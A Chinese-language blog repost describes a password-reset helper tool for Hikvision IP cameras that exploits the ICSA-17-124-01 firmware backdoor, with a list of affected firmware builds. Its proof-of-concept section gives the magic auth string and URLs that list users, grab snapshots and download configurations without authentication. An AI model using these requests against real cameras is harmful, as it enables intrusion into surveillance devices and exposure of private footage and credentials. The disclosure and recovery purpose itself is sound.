前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >海康威视网络摄像机后门

海康威视网络摄像机后门

作者头像
Khan安全团队
发布2022-03-21 09:33:44
1.7K0
发布2022-03-21 09:33:44
举报
文章被收录于专栏:Khan安全团队

Hik密码助手

一种利用大约 2014-2016 年的海康威视相机固件 ( ICSA-17-124-01 ) 中的后门来帮助所有者更改忘记密码的工具。

用法

HikvisionPasswordResetHelper.exe从发布选项卡下载并运行 exe。

重置密码有 5 个简单的步骤,在很多情况下您甚至可以跳过第 3 步和第 4 步。

截屏
截屏

要求

.NET Framework 4.5.2 - 这包含在任何现代 Windows 安装中。

易受ICSA-17-124-01攻击的海康威视设备。

以下是据报道是否存在漏洞的相机固件的不完整列表。此列表是从各种来源编译的,相机型号未指定。 据报道,某些相机型号在不同的固件版本范围内易受攻击,因此我不会完全相信此列表对所有相机型号的准确性。

海康威视摄像头固件版本

代码语言:javascript
复制
- V5.1.6 内部版本 140412 - 无漏洞(至 ICSA-17-124-01)   
+ V5.2.0 内部版本 140721 - 漏洞  
+ V5.2.0 内部版本 141016 - 漏洞  
+ V5.3.0 内部版本 150513 - 漏洞  
+ V5.3.3 内部版本 150514 -易受攻击  
+ V5.3.6 构建 151105 - 易受攻击  
+ V5.3.8 构建 151224 - 易受攻击  
+ V5.3.5 构建 161112 - 易受攻击  
+ V5.4.0 构建 160401 - 易受攻击  
+ V5.4.0 构建 160520 - 易受攻击  
+ V5.4.1 构建 160525 - 易受攻击  
+ V5.4.0 构建 160530 - 易受攻击  
+ V5.4.3 构建 160705 - 易受攻击  
+V5.4.3 构建 160808 - 易受攻击  
+ V5.4.4 构建 161125 - 易受攻击  
+ V5.3.9 构建 170109 - 易受攻击  
- V5.4.3 构建 170123 - 非易受攻击  
- V5.4.5 构建 170123 - 非易受攻击  
- V5.4.3 构建 170217 - 非易受攻击  

海康威视包含一个魔术字符串,允许即时访问任何摄像机,无论管理员密码是什么。只需将此字符串附加到海康威视相机命令:(?auth=YWRtaW46MTEK)

概念证明:

检索所有用户及其角色的列表:

- http://camera.ip/Security/users?auth=YWRtaW46MTEK

获取未经身份验证的相机快照:

- http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

下载相机配置:

- http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Hik密码助手
    • 用法
      • 要求
        • 海康威视摄像头固件版本
    相关产品与服务
    多因子身份认证
    多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档